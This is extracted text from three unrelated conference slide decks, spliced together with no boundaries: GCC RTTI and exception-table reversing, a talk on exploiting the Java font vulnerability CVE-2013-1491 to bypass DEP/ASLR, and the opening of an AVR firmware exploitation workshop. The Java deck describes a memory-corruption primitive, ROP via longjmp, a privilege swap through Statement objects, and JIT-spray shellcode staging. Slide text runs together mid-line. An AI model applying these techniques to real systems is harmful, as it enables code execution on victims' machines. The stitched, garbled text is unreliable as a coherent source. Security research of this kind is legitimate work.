be 0. This allows us to identify class vtables if we know 
RTTI address
`vtable for'SubClass 
  dd 0                              ; offset to base
  dd offset `typeinfo for'SubClass  ; type info pointer
  dd offset SubClass::vfunc1(void)  ; first virtual function
  dd offset BaseClass::vfunc2(void) ; second virtual function
27(c) 2012 Igor SkochinskyGCC: RTTI
GCC's RTTI is based on the Itanium C++ ABI [1]
The basic premise is: typeid() operator returns an instance 
of a class inherited from std::type_info
For every polymorphic class (with virtual methods), the 
compiler generates a static instance of such class and 
places a pointer to it as the first entry in the Vtable
The layout and names of those classes are standardized, 
so they can be used to recover names of classes with 
RTTI
[1] http://sourcery.mentor.com/public/cxx-abi/abi.html
28(c) 2012 Igor SkochinskyGCC: RTTI classes
For class recovery, we're only interested in three classes 
inherited from type_info
class type_info
{
  //void *vfptr;
private:
  const char *__type_name;
};// a class with no bases
class __class_type_info : public 
std::type_info {}
// a class with single base
class __si_class_type_info: public 
__class_type_info {
public:
  const __class_type_info 
*__base_type;
};// a class with multiple bases
class __vmi_class_type_info : public 
__class_type_info {
public:
  unsigned int __flags;
  unsigned int __base_count;
  __base_class_type_info __base_info[1];
};
struct __base_class_type_info {
public:
 const __class_type_info *__base_type;
 long __offset_flags;
}
29(c) 2012 Igor SkochinskyGCC: recovery of class names from RTTI
Find vtables of __class_type_info, __si_class_type_info, 
__vmi_class_type_info
Look for references to them; those will be instances of 
typeinfo classes
From the __type_name member, mangled name of the 
class can be recovered, and from other fields the 
inheritance hierarchy
By looking for the pair (0, pTypeInfo), we can find the 
class virtual table
`typeinfo for'SubClass
  dd offset `vtable for'__cxxabiv1::__si_class_type_info+8
  dd offset `typeinfo name for'SubClass ; "8SubClass"
  dd offset `typeinfo for'BaseClass
30(c) 2012 Igor SkochinskyGCC: RTTI example
0
`typeinfo for'BaseClass
___cxa_pure_virtual
BaseClass::vfunc2(void)0
`typeinfo for'SubClass
SubClass::vfunc1(void)
BaseClass::vfunc2(void)`vtable for'__si_class_type_info+8
`typeinfo name for'SubClass
`typeinfo for'BaseClass
`vtable for'__class_type_info+8
`typeinfo name for'BaseClass`vtable for'BaseClass `vtable for'SubClass `typeinfo for'SubClass 
`typeinfo for'BaseClass
31(c) 2012 Igor SkochinskyGCC: exceptions
Two kinds of implementing exceptions are commonly 
used by GCC:
SjLj (setjump-longjump)
"zero-cost" (table-based)
These are somewhat analogous to VC's x86 stack-based 
and x64 table-based SEH implementations
SjLj is simpler to implement but has more runtime 
overhead, so it's not very common these days
MinGW used SjLj until GCC 4.3(?), and iOS on ARM 
currently supports only SjLj
32(c) 2012 Igor SkochinskyGCC: SjLj exceptions
Similar to x86 SEH, a structure is constructed on the stack 
for each function that uses exception handling
However, instead of using list in fs:0, implementation-
specific functions are called at entry and exit 
(_Unwind_SjLj_Register/_Unwind_SjLj_Unregister)
The registration structure can vary but generally uses this 
layout:
struct SjLj_Function_Context
{
  struct SjLj_Function_Context *prev;
  int call_site;
  _Unwind_Word data[4];
  _Unwind_Personality_Fn personality;
  void *lsda;
  int jbuf[];
};
33(c) 2012 Igor SkochinskyGCC: SjLj exceptions
personality  points to the so-called "personality function" 
which is called by the unwinding routine during exception 
processing 
lsda points to "language-specific data area" which 
contains info in the format specific to the personality 
routine
call_site  is analogous to the state variable of VC's EH 
and is updated by the compiler on every change which 
might need an corresponding unwinding action
jbuf contains architecture-specific info used by the 
unwinder to resume execution if the personality routine 
signals that a handler has been found
However, usually jbuf[2] contains the address of the 
landing pad  for the function
34(c) 2012 Igor SkochinskySjLj setup example
ADD   R0, SP, #0xA4+_sjlj_ctx
LDR   R3, [R3] ; ___gxx_personality_sj0
STR   R3, [SP,#0xA4+_sjlj_ctx.personality]
LDR   R3, =_lsda_sub_14F94
STR   R7, [SP,#0xA4+_sjlj_ctx.jbuf]
STR   R3, [SP,#0xA4+_sjlj_ctx.lsda]
LDR   R3, =lp_sub_14F94
STR   SP, [SP,#0xA4+_sjlj_ctx.jbuf+8]
STR   R3, [SP,#0xA4+_sjlj_ctx.jbuf+4]
BL    __Unwind_SjLj_Register
MOV   R3, #2
STR   R3, [SP,#0xA4+_sjlj_ctx.call_site]
_sjlj_ctx.personality = &__gxx_personality_sj0;
_sjlj_ctx.jbuf[0] = &v11; // frame pointer
_sjlj_ctx.lsda = &lsda_sub_14F94;
_sjlj_ctx.jbuf[2] = &v5;  // stack pointer
_sjlj_ctx.jbuf[1] = lp_sub_14F94; // landing pad
_Unwind_SjLj_Register(&_sjlj_ctx);
_sjlj_ctx.call_site = 2;
35(c) 2012 Igor SkochinskySjLj landing pad: unwinding
The SjLj landing pad handler inspects the call_site  
member and depending on its value performs unwinding 
actions (destruct local variables) or executes user code in 
the catch blocks.
__lp__sub_1542C
  LDR     R3, [SP,#0x114+_sjlj_ctx.call_site]
  LDR     R2, [SP,#0x114+_sjlj_ctx.data]
  CMP     R3, #1
  STR     R2, [SP,#0x114+exc_obj]
  BEQ     unwind_from_state1
  CMP     R3, #2
  BEQ     unwind_from_state2
  CMP     R3, #3
  BEQ     unwind_from_state3
  [...]unwind_from_state3
  ADD     R0, SP, #0x114+tmp_str3
  MOV     R3, #0
  STR     R3, [SP,#0x114+_sjlj_ctx.call_site]
  BL      std::string::~string()
  MOV     R3, #0
  ADD     R0, SP, #0x114+_sjlj_ctx
  STR     R3, [SP,#0x114+_sjlj_ctx.call_site]
  [...]
  MOV     R3, 0xFFFFFFFF
  LDR     R0, [SP,#0x114+exc_obj]
  STR     R3, [SP,#0x114+_sjlj_ctx.call_site]
  BL      __Unwind_SjLj_Resume
36(c) 2012 Igor SkochinskySjLj landing pad: catch blocks
If the current state corresponds to a try block, then the 
landing pad handler checks the handler switch value  to 
determine which exception was matched
__lp__GpsRun
  LDR  R2, [SP,#0xD4+_sjlj_ctx.data]
  LDR  R3, [SP,#0xD4+_sjlj_ctx.call_site]
  STR  R2, [SP,#0xD4+exc_obj]
  LDR  R2, [SP,#0xD4+_sjlj_ctx.data+4]
  CMP  R3, #1
  STR  R2, [SP,#0xD4+handler_switch_val]
  BEQ  _GpsRun_lp_01
  CMP  R3, #2
  BEQ  _GpsRun_lp_02_GpsRun_lp_02
  LDR  R2, [SP,#0xD4+handler_switch_val]
  CMP  R2, #2
  BNE  _catch_ellipsis
  LDR  R0, [SP,#0xD4+exc_obj]
  BLX  ___cxa_begin_catch
  [...]
  MOVS R3, #0
  STR  R3, [SP,#0xD4+_sjlj_ctx.call_site]
  BLX ___cxa_end_catch
37(c) 2012 Igor SkochinskyGCC exceptions: zero-cost
"Zero-cost" refers to no code overhead in the case of no 
exceptions (unlike SjLj which has set-up/tear-down code 
that is always executed)
Uses a set of tables encoding address ranges, so does 
not need any state variables in the code
Format and encoding is based on Dwarf2/Dwarf3
The first-level (language-independent) format is described 
in Linux Standard Base Core Specification [1]
Second-level (language-specific) is based on HP Itanium 
implementation [2] but differs from it in some details
[1] http://refspecs.linuxbase.org/LSB_4.1.0/LSB-Core-generic/LSB-Core-generic/ehframechpt.html
[2] http://sourcery.mentor.com/public/cxx-abi/exceptions.pdf
38(c) 2012 Igor SkochinskyGCC exceptions: .eh_frame
Format of the section is based on Dwarf's debug_frame
Consists of a sequence of Common Frame Information 
(CFI) records
Each CFI starts with a Common Information Entry (CIE) 
and is followed by one or more Frame Description Entry 
(FDE)
Usually one CFI corresponds
to one object file and one FDE
to a function  CFI 0
    CIE 0
    FDE 0-0
    FDE 0-1
    FDE 0-2
    ...
  CFI 1
    CIE 1
    FDE 1-0
    FDE 1-1
    ...
39(c) 2012 Igor Skochinsky.eh_frame: Common Information Entry
Field Meaning
Length (uint32) total length of following data; 0 means 
end of all records
Extended Length (uint64) present if Length==0xFFFFFFFF
CIE_id (uint32) Must be 0 for a CIE
Version (uint8) 1 or 3
Augmentation (asciiz string) Indicates presence of additional fields
Code alignment factor (uleb128) Usually 1
Data alignment factor (sleb128) Usually -4 (encoded as 0x7C)
return_address_register (uint8 (version 
1) or uleb128)Dwarf number of the return register
Augmentation data length (uleb128) Present if Augmentation[0]=='z'
Augmentation data Present if Augmentation[0]=='z'
Initial instructions Dwarf Call Frame Instructions
40(c) 2012 Igor Skochinsky.eh_frame: Augmentation data
Each string character signals that additional data is present in 
the "Augmentation data" of the CIE (and possibly FDE)
String character Data Meaning
'z' uleb128 Length of following data
'P' personality_enc (uint8) Encoding of the following pointer
personality_ptr Personality routine for this CIE
'R' fde_enc (uint8) Encoding of initial location and length 
in FDE (if different from default)
'L' lsda_enc Encoding of the LSDA pointer in FDE's 
augmentation data
41(c) 2012 Igor Skochinsky.eh_frame: Frame Description Entry
Field Meaning
Length (uint32) total length of following data; 0 means 
end of all records
Extended Length (uint64) present if Length==0xFFFFFFFF
CIE pointer (uint32) Distance to parent CIE from this field
Initial location (fde_encoding) Address of the first instruction in the 
range
Range length (fde_encoding.size) Length of the address range
Augmentation data length (uleb128) Present if CIE.Augmentation[0]=='z'
Augmentation data Present if CIE.Augmentation[0]=='z'
Instructions Dwarf Call Frame Instructions
"Augmentation data" contains pointer to LSDA if CIE's 
augmentation string included the L character
42(c) 2012 Igor Skochinsky.eh_frame: pointer encodings
Bits 0:3 (0x0F): data format
Bits 4:6 (0x70): how the value is applied
Bit 7 (0x80): the value should be dereferenced to get final address
Common encodings: 0xFF – value omitted; 0x00 – native-sized absolute pointer; 0x1B – 
self-relative 4-byte displacement; 0x9B – dereferenced self-relative 4-byte displacement
Name ValueName Value
DW_EH_PE_ptr 0x00DW_EH_PE_absptr 0x00
DW_EH_PE_uleb128 0x01DW_EH_PE_pcrel 0x10
DW_EH_PE_udata2 0x02DW_EH_PE_textrel 0x20
DW_EH_PE_udata4 0x03DW_EH_PE_datarel 0x30
DW_EH_PE_udata8 0x04DW_EH_PE_funcrel 0x40
DW_EH_PE_sleb128 0x09DW_EH_PE_aligned 0x50
DW_EH_PE_sdata2 0x0ADW_EH_PE_indirect 0x80
DW_EH_PE_sdata4 0x0BDW_EH_PE_omit 0xFF
DW_EH_PE_sdata8 0x0C
43(c) 2012 Igor SkochinskyGCC: .gcc_except_table (LSDA)
Used by both SjLj and table based implementations to encode 
unwinding actions and catch handlers for try blocks
Although LSDA is indeed language-specific and GCC uses 
different personality functions to parse it, the overall layout is 
very similar across most implementations
In fact, the SjLj (_sj0) and table-based (_v0) personality 
functions use almost identical format
It also uses Dwarf encoding (LEB128) and pointer encodings 
from .eh_frame
Consists of: header, call site table, action table and optional 
type table
44(c) 2012 Igor SkochinskyGCC: LSDA
Field Meaning
lpstart_encoding (uint8) Encoding of the following field (landing pad start 
offset)
LPStart (encoded) Present if lpstart_encoding != DW_EH_PE_omit 
(otherwise default: start of the range in FDE)
ttype_encoding (uint8) Encoding of the pointers in type table
TType (uleb128) Offset to type table from the end of the header
Present if ttype_encoding != DW_EH_PE_omitLSDA HeaderHeader
Call site table
Action table
Types table (optional)LSDA
45(c) 2012 Igor SkochinskyGCC: LSDA
call_site_encoding (uint8) Encoding of items in call site table
call_site_tbl_len (uleb128) Total length of call site tableLSDA call site table header 
cs_lp (uleb128) New "IP" value (call_site variable)
cs_action (uleb128) Offset into action table (+1) or 0 for no actionLSDA call site entry (SjLj)
cs_start (call_site_encoding) Start of the IP range
cs_len (call_site_encoding) Length of the IP range
cs_lp (call_site_encoding) Landing pad address
cs_action (uleb128) Offset into action table (+1) or 0 for no actionLSDA call site entry (table-based)
46(c) 2012 Igor SkochinskyGCC: LSDA
ar_filter (sleb128) Type filter value (0 = cleanup)
ar_disp (sleb128) Self-relative byte offset to the next action (0 = end)LSDA action table entry
Filter value
... ...
T3 typeinfo ( ttype_encoding) 3
T3 typeinfo ( ttype_encoding) 2
T1 typeinfo ( ttype_encoding) 1
idx1, idx2, idx3, 0 (uleb128) -1
idx4, idx5, idx6, 0 (uleb128) -N
... ...LSDA type table
TTBase Catches
Exception
specifications
47(c) 2012 Igor SkochinskyGCC: LSDA processing
The personality function looks up the call site record which 
matches the current IP value (for SjLj the call_site  variable is 
used)
If there is a valid action (non-zero) then it is "executed" – the 
chain of action records is walked and filter expressions are 
checked
If there is a filter match or a cleanup record found 
(ar_filter==0) then the control is transferred to the landing pad
For SjLj, there is a single landing pad handler so the call_site 
is set to the cs_lp value from the call site record
For table-based exceptions, the specific landing pad for the 
call site record is run
48(c) 2012 Igor SkochinskyGCC: EH optimizations
The eh_frame structure uses variable-length encodings which 
(supposedly) saves space at the expense of slower look up at 
run time
Some implementations introduce various indexing and lookup 
optimizations
49(c) 2012 Igor SkochinskyGCC EH optimizations: .eh_frame_hdr
A table of pairs (initial location, pointer to the FDE in .eh_frame)
Table is sorted, so binary search can be used to quickly search
PT_EH_FRAME header is added to ELF program headers
version (uint8) structure version (=1)
eh_frame_ptr_enc (uint8) encoding of eh_frame_ptr
fde_count_enc (uint8) encoding of fde_count
table_enc (uint8) encoding of table entries
eh_frame_ptr (enc) pointer to the start of the .eh_frame section
fde_count (enc) number of entries in the table
initial_loc[0] (enc) initial location for the FDE
fde_ptr[0] (enc) corresponding FDE
... ...
50(c) 2012 Igor SkochinskyGCC EH optimizations: __unwind_info
An additional section added to Mach-O binaries on OS X
Contains entries for efficient lookup
More info: compact_unwind_encoding.h in libunwind
struct unwind_info_section_header
{
    uint32_t    version;            // UNWIND_SECTION_VERSION
    uint32_t    commonEncodingsArraySectionOffset;
    uint32_t    commonEncodingsArrayCount;
    uint32_t    personalityArraySectionOffset;
    uint32_t    personalityArrayCount;
    uint32_t    indexSectionOffset;
    uint32_t    indexCount;
    // compact_unwind_encoding_t[]
    // uintptr_t personalities[]
    // unwind_info_section_header_index_entry[]
    // unwind_info_section_header_lsda_index_entry[]
};
51(c) 2012 Igor SkochinskyGCC EH optimizations: ARM EABI
.ARM.exidx contains a map from program addresses to unwind info instead of .eh_frame
Short unwind encodings are inlined, longer ones are stored in .ARM.extab
EABI provides standard personality routines, or custom ones can be used
GCC still uses __gxx_personality_v0, and the same LSDA encoding
This kind of exception handling is also used in Symbian EPOC files
Word 0 Word 1
+-+----------------------+
|0| prel31_offset_to_fnc |
+-+----------------------+
31 30                   0EXIDX_CANTUNWIND           +----------------------+-+
                           |                      |1|
                           +----------------------+-+
                           31                    1 0
The ex table entry itself  +-+----------------------+
encoded in 31bit           |1|     ex_tbl_entry     |
                           +-+----------------------+
                           31 30                   0
prel31 offset of the start +-+----------------------+
of the table entry for     |0|   tbl_entry_offset   |
this function              +-+----------------------+
                           31 30                   0
Credit: https://wiki.linaro.org/KenWerner/Sandbox/libunwind
52(c) 2012 Igor SkochinskyGCC: references
http://www.airs.com/blog/archives/460  (.eh_frame)
http://stackoverflow.com/questions/87220/
apple/gcc: gcc/gcc-5493/libstdc++-v3/libsupc++/
http://sourcery.mentor.com/public/cxx-abi/abi-eh.html
http://sourcery.mentor.com/public/cxx-abi/exceptions.pdf
http://www.x86-64.org/documentation/abi.pdf
Exploiting the Hard-Working DWARF (James Oakley & 
Sergey Bratus)
53(c) 2012 Igor SkochinskyConclusions
RTTI is very useful for reverse engineering
Helps discover not just class names but also inheritance 
hierarchy
Necessary for dynamic_cast, so present in many complex 
programs
Not removed by symbol stripping
Parsing exception tables is necessary to uncover all possible 
execution paths
Can improve static analysis (function boundaries etc.)
Some implementation are very complicated and are likely to 
have bugs – a potential area for vulnerabilities
54(c) 2012 Igor SkochinskyThank you!
Questions?Exploit Your Java Native 
Vulnerabilities on Win7/JRE7 in One 
Minute
Or how to exploit a single java vulnerability
in three different ways
Today we are not talking about how to 
find 0day java native vulnerabilities, but 
how to “cook” them 

About me
•Architect, Trend Micro China 
Development Center
•Interested in vulnerabilities, 
sandbox technique, anti -APT 
solution
•Hardcore ACG otaku

Agenda
•Background
•The vulnerability
•Exploit method 1 
•Exploit method 2
•Exploit method 3
•Conclusion
What is java native vulnerability?
•Vulnerability which exists in JRE native code 
(C/C++ code)
–Stack overflow
–Heap overflow
–Buffer overflow/underflow
–...
•Aka, java memory corruption vulnerability
Trends of Java native vulnerability

Exploit Java native vulnerability
•JRE 6
–No DEP , ASLR
–Find a schoolchild and teach him Heap Spray
•JRE 7
–Opt-in DEP , ASLR, windows 7, windows 8 ...
–Hmmm, seems much harder ?
–Actually not so hard , we will show you how to in 
this presentation 
Agenda
•Background
•The vulnerability
•Exploit method 1 
•Exploit method 2
•Exploit method 3
•Conclusion
CVE-2013 -1491
•Found by Joshua J. Drake (jduck)
•Used on Pwn2013, defeated JRE 7 + 
Windows8 ( Accuvant Lab's White Paper )
•We also discovered the same issue in Feb 
2013, via our java font fuzzer, and finished the 
exploits in April 2013
CFF Font Instructions
•Compact Font Format, or Type2 font
•You can write instructions (byte codes) to help 
building a character at runtime
private static native long0A: call sub routine
0B: return from sub routine
0C  0A:     add
0C  0B:     sub
0C  0C:     div
0C  0D:     load stack
Related Data Structures
•TopDictInfo
–buildCharArray –dynamic allocated array
–reg_WeightVector –static array in the structure

The two vulnerable instructions
•store [0, j, index, count]
•load [0, index, count]
No array boundary checks on store/load !
What can we do with it
•Read/Write arbitrary 16 -bit range in the 
buildCharArray and regWeightVector
•By over writing the buildCharArray  pointer, 
we can achieve arbitrary address read/write
Example
Initial State T->topDictData
...
buildCharArray
...
reg_WeightVector0x2000000
0x200087c0x20007b40x2100000
Step1
put(0, 0x0c0c0c0c)
T->topDictData
...
buildCharArray
...
reg_WeightVector0x2000000
0x200087c0x20007b40x2100000
0c0c0c0cbuildCharArray[0] = 0x0c0c0c0c;
Step2
store(0, -18, 0, 1)
T->topDictData
...
buildCharArray
...
reg_WeightVector0x2000000
0x200087c0x20007b40x21000000c0c0c0creg_WeightVector[ -18] = buildCharArray[0];
Step3
put(0, 0x41414141)
T->topDictData
...
buildCharArray
...
reg_WeightVector0x2000000
0x200087c0x20007b40x0c0c0c0c
41414141buildCharArray[0] = 0x41414141;
Agenda
•Background
•The vulnerability
•Exploit method 1 
•Exploit method 2
•Exploit method 3
•Conclusion
Information Leak + ROP

Information Leak
•Read a function pointer from the structure
•Sub a pre -computed offset from the function 
pointer address, to get base address of t2k.dll
•Get other dll base (e.g. msvcrt) from IAT of 
t2k.dll
ROP
1. Write ROP gadgets into buildCharArray
2. Set jmp_buf ->eip to the first ROP instruction
3. Set jmp_buf ->esp to buildCharArray
4. Trig an internal error to call longjmpstruct TopDictInfo {
tsiMemObject *mem; 
...
}
struct 
tsiMemObject {
...
jmp_buf env;
...
}...
esp...
...
eip
Agenda
•Background
•The vulnerability
•Exploit method 1 
•Exploit method 2
•Exploit method 3
•Conclusion
Overwrite Array Length + 
Statement

Java Array in memory
Object 
Headlength
 a[0]
 a[1]
...
 a[n]8 bytes 4 bytes
If we can overwrite the length field, then we can read/write 
out of the bound of this java array
Array Spray 

Overwrite Array length
•Set buildCharArray to 0x23ad27d8 (this address may 
vary in different OS)
•Write “0x7fffffff” to 0x23ad27d8, which will be the 
new array length 

Overwrite ACC in Statement Object
•Statement:  call method on a target object
•AccessControlContext: check permission on 
privileged operations

Overwrite ACC in Statement Object
•When a new statement is created, the acc is set to 
the “snapshot” of current calling context
•If you created the statement in low privileged code, 
the acc will be a low privileged ACC 
•We can replace the acc with a powerful ACC in 
memory  
Object 
Head
acc
 target
...
 ... ...Statement Object memory layout
Powerful 
ACC
Method 2 –Exploit Procedure
length
data1. Allocate arrays
accstatement2. Allocate statement
object right after the array
Memory Space3. Overwrite array length
new length4. Overwrite acc in statement
powerful acc
Demo
•Exploit CVE -2013 -1491 using Array length 
overwriting + Statement
Method2 -Limitation
•You need to be able to overwrite memory of 
Java Object Heap
JVMjava object heap java native heapJava 
object
Java 
ArrayDefault heap 
of JRE native 
code 
Agenda
•Background
•The vulnerability
•Exploit method 1 
•Exploit method 2
•Exploit method 3
•Conclusion
JIT Spray

History of JIT Spray
•Dion Blazakis -interpreter exploitation: 
pointer inference and spraying
•Alexey Sintsov -Writing JIT shellcode for fun 
and profit
•TT Tsai -The Flash JIT Spraying is Back
History of JIT Spray
•Mostly focus on flash
•No practical POC & Guide on Java
Java JIT Compiler
Java compiler,
into byte code in class file
JIT compiler, into native code
Java JIT Compiler (.cont)
•View JIT generated code
–-XX:+UnlockDiagnosticVMOptions -
XX:+PrintAssembly
•CompileThreshold
–Only when a function is called > CompileThreshold 
times, it will be JITed
–Default value: 1500 for client JVM
XOR in java JIT compiler
public int spray(int a) {
int b = a;
b ^= 0x90909090;
b ^= 0x90909090;
b ^= 0x90909090;
return b;
}0x01c21507: cmp    0x4(%ecx),%eax
0x01c2150a: jne    0x01bbd100         ;
0x01c21510: mov    %eax,0xffffc000(%esp)
0x01c21517: push   %ebp
0x01c21518: sub    $0x18,%esp        
0x01c2151b: xor    $0x90909090,%edx
0x01c21521: xor    $0x90909090,%edx
0x01c21527: xor    $0x90909090,%edx
...
0x01c21539: ret
XOR in java JIT compiler (.cont)
•The XOR statement is compiled to an instruction of 
six bytes
–81 F2 90 90 90 3C  xor edx, 0x3C909090
•We can replace the 3 NOP bytes with our shellcode
Set EIP in the middle
$0:    81 F2 90 90 90 3C :  xor edx, 0x3C909090
$6:    81 F2 90 90 90 3C :  xor edx, 0x3C909090
$12:  81 F2 90 90 90 3C :  xor edx, 0x3C909090
$0:       81 F2 
$2:       90 nop
$3:       90       nop 
$4:       90         nop
$5:       3C 81  cmp     al, 81
$7:       F2         repne
$8:       90 nop
$9:       90         nop 
$10:     90         nop
$11:     3C 81   cmp     al, 81EIP
EIP

Find a reliable EIP to jump to
•0x02cd70b7
–Fairly reliable on the tested systems:
–windows xp sp3, windows 7 home edition, 
windows 7 enterprise edition, windows 8 home 
edition
Spray multiple functions at runtime
•ClassLoader.loadClass
JIT00002.class
 JIT00001.class
 ...
Exploit.class
Performance
•First version: 20 ~ 40s to spray 2400 functions
–Because we have to call a function 1500 times 
before it can be JITed
•Use pre warm up: 7 ~ 9s

Shellcode
•Two-Staged
–Stage0 : Sprayed by JIT functions, will search for 
Stage1 shellcode and execute it (egg -hunt)
–Stage1 : Defined in java string, do the real work

Demo
•Exploit CVE -2013 -1491 using JIT Spray
Add JIT Spray to your POC in one 
minute
•Demo
–Add JIT Spray to CVE -2013 -0809 POC
–We will public all related code after the 
presentation
Optional Demo
•JRE 7 native 0day + Win8 + Java JIT Spray
Java JIT Spray -Limitation
•Currently only works on 32bits platform
•You need to be able to control EIP precisely
Agenda
•Background
•The vulnerability
•Exploit method 1 
•Exploit method 2
•Exploit method 3
•Conclusion

Conclusion
•We introduced 3 different methods to exploit 
a java native vulnerability and bypass 
DEP/ASLR
•You need to choose the one that fit your 
vulnerability
Conclusion
•Choose JIT Spray if 32bits & you can control 
the EIP
•Choose Array + Statement if you can overwrite 
a java array on java object heap
•Choose Information Leak + ROP if you are 
Vupen
"Heapsprays are for the 99%"
“And so are JIT sprays."
Thank you!
Q & A Practical Firmware Reversing 
and Exploit Development for 
AVR-based Embedded Devices 
Alexander @dark_k3y Bolshev
Boris @ dukeBarman Ryutin

; cat / dev/user(s)
•Alexander Bolshev (@dark_key ), Security 
Researcher, Ph.D., Assistant Professor @ SPbETU
•Boris Ryutin (@dukeBarman ), radare2 evangelist, 
Security Engineer @ ZORSecurity

Agenda
Hour 1
•Part 1: Quick RJMP to AVR + Introduction example
Hours 2 -3:
•Part 2: Pre -exploitation
•Part 3: Exploitation and ROP -chains building
•Part 4: Post -exploitation and tricks
Hour 4:
•Mitigations
•CFP! (Powered by Roman Bazhin )
Disclaimer:
1) Workshop is VERY fast-paced.
2) Workshop is highly -practical
3) You may encounter information 
overflowIf you have a 
question, please 
interrupt and ask 
immediately
Image Credit: Marac Kolodzinski

Part 1: What is AVR?
AVR
•Alf (EgilBogen ) and Vegard (Wollan )’s RISC processor
•Modified Harvard architecture 8 -bit RISC single -chip microcontroller 
•Developed by Atmel in 1996 (now Dialog/Atmel)
Image: https:// de.wikipedia.org /wiki/Atmel AVR 

AVR is almost everywhere 
•Industrial PLCs and gateways
•Home electronics: kettles, irons, weather stations, etc
•IoT
•HID devices (ex.: Xbox hand controllers )
•Automotive applications: security, safety, powertrain and 
entertainment systems. 
•Radio applications (and also Xbee and Zwave )
•Arduino platform 
•Your new shiny IoEfridge ;)
AVR inside industrial gateway

Synapse IoTmodule with Atmega128RFA1 inside 

Philips Hue Bulb
http ://www.eetimes.com /document.asp?doc_id =1323739&image_number=1

AVR inside home automation dimmer 

Harvard Architecture
Harvard Architecture
•Physically separated storage and signal pathways for instructions and 
data 
•Originated from the Harvard Mark I relay -based computer 
Image: https:// en.wikipedia.org /wiki/Harvard architecture 

Modified Harvard architecture ...
...allows the contents of the instruction memory to be accessed as if it were data1
1but not the data as code! 
Introduction example:
We’re still able to exploit!

AVR “features”
AVR-8
•MCU ( MicroController Unit) --single computer chip designed for 
embedded applications
•Low-power
•Integrated RAM and ROM (SRAM + EEPROM + Flash)
•Some models could work with external SRAM
•8-bit, word size is 16 bit (2 bytes)
•Higher integration 
•Single core/Interrupts
•Low-freq (<20MHz in most cases)
Higher Integration
•Built -in SRAM, EEPROM an Flash
•GPIO (discrete I/O pins)
•UART(s)
•I2C, SPI, CAN, ...
•ADC
•PWM or DAC
•Timers
•Watchdog
•Clock generator and divider(s)
•Comparator(s)
•In-circuit programming and debugging support
AVRs are very different
•AtTiny13
•Up to 20 MIPS Througput at 20 MHz
•64 SRAM/64 EEPROM/1k Flash
•Timer, ADC, 2 PWMs, Comparator, 
internal oscillator
•0.24mA in active mode, 0.0001mA in 
sleep mode

AVRs are very different
•Atmega32U4
•2.5k SRAM/1k EEPROM/32k Flash
•JTAG
•USB
•PLL, Timers, PWMs, Comparators, 
ADCs, UARTs, Temperatures sensors, 
SPI, I2C, ... => tons of stuff

AVRs are very different
•Atmega128
•4k SRAM/4k EEPROM/128k Flash
•JTAG
•Tons of stuff: ...
In the rest of the workshop we will focus on this chip

Why Atmega128?
•Old, but very widespread chip. 
•At90can128 –popular analogue for CAN buses in automotive 
application
•Cheap JTAG programmer
•Much SRAM == ideal for ROP -chain construction training
Let’s look to the architecture of Atmega128 ...


Ok, ok, let’s simplify a bit 
Image: http ://www.cs.jhu.edu /~jorgev /cs333/ usbkey /uC_3.JPG
Note: code is separated from data

Memory map

Memory: registers 
•R1-R25 –GPR
•X,Y ,Z –pair “working” 
registers, e.g. for memory 
addressing operations
•I/O registers –for accessing 
different “hardware”

Memory: special registers
•PC –program counter, 16 -bit register
•SP –stack pointer, 16 -bit register (SPH:SPL)
•SREG –status register (8 -bit)
Memory addressing
•SRAM/EEPROM –16-bit addressing, 8 -bit element
•Flash –16(8) -bit addressing, 16 -bit element
LPM 
command!
Memory addressing directions
•Direct to register
•Direct to I/O
•SRAM direct
•SRAM indirect (pre-and post -increment)
•Flash direct 
Datasheets are your best friends!


Interrupts
•Interrupts normal process of code 
execution for handling something 
or reacting to some event
•Interrupt handler –procedure to 
be executed after interrupt; 
address stored in the interrupt 
vector
•Examples of interrupts:
•Timers
•Hardware events
•Reset

AVR assembly
In a very quick 
manner
Instruction types
•Arithmetic and logic
•Bit manipulation/test
•Memory manipulation
•Unconditional jump/call
•Branch commands
•SREG manipulation
•Special (watchdog, etc)
Instruction mnemonics
mov r16,r0 ; Copy r0 to r16
out PORTA, r16 ; Writer16 toPORTA
16-bit long
“Intel syntax” (destination before source)
A bit more about architecture
Fuses and Lock Bits
•Several bytes of permanent storage
•Set internal hardware and features 
configuration, including oscillator 
(intor ext), bootloader , pin, ability to 
debug/ programm , etc.
•2 lock bits controls programming 
protection. 

AVR bootloader –what is it?
•Part of code that starts BEFORE RESET interrupt.
•Could be used for self -programmable (i.e. without external device) 
systems, in case you need to supply firmware update for your IoT
device.
•Bootloader address and behavior configured via FUSEs.
•BLB lock bits controls bootloader ability to update application and/or 
bootloader parts of flash.
AVR bootloaders
•Arduino bootloader
•USB bootloaders (AVRUSBBoot )
•Serial programmer bootloaders (STK500 -compatible)
•Cryptobootloaders
•...
•Tons of them!
Watchdog
•Timer that could be used for interrupt or reset device.
•Cleared with WDR instruction.
http ://ardiri.com /blog /entries /20141028/ watchdog.jpg

Development for AVR
Atmel studio

AVR-GCC
•Main compiler/debugger kit for the platform
•Used by Atmel studio
•Use “AVR libc” --http:// www.nongnu.org /avr-libc/ 
•Several optimization options, several memory models
Other tools
•Arduino
•CodeVision AVR
•IAR Embedded workbench
Debugging AVR
JTAG
•Joint Test Action Group (JTAG)
•Special debugging interface added to a chip
•Allows testing, debugging,  firmware manipulation and boundary 
scanning.
•Requires external hardware
JTAG for AVRs
AVR JTAG mkIAVR JTAG mkII
AVR DragonAVR JTAGIce3
Atmel ICE3

Avarice
•Open -source interface between AVR JTAG and GDB 
•Also allow to flash/write eeprom , manipulate fuse and lock bits.
•Could capture the exeuction flow to restore the firmware
•Example usage:
avarice --program --file test.elf --part atmega128 --jtag/dev/ttyUSB0 :4444
AVR-GDB
•Part of “ nongnu ” AVR gcckit.
•Roughly ported standard gdb to AVR platform
•Doesn’t understand Harvard architecture, i.e. to read flash you will 
need to resolve it by reference of $pc:
(gdb) x/10b $pc + 100
Simulators
•Atmel Studio simulator
•Proteus simulator
•Simavr
•Simulavr
VM access:
Login: radare
Password: radare
Real hardware
cd /home/ radare/workshop/ex1.1
avarice --mkI--jtag/dev/ttyUSB0 -p -e --file build -crumbuino128/ex1.1.hex -g :4242
avr-gdb
Communication: cutecom orscreen / dev/ttyUSB1 9600
Simulator
cd /home/ radare/workshop/ex1.1_simulator
simulavr -P atmega128 -F 16000000 –f build-crumbuino128/ex1.1.elf
avr-gdbEx 1.1: Hello world!

Real hardware
cd /home/ radare/workshop/ex1.2
avarice --mkI--jtag/dev/ttyUSB0 -p -e --file build -crumbuino128/ex1.2.hex -g :4242
avr-gdbEx 1.2: Blink!

AVR RE
Reverse engineering AVR binaries
Pure disassemblers:
•avr-objdump –gcckit standard tool
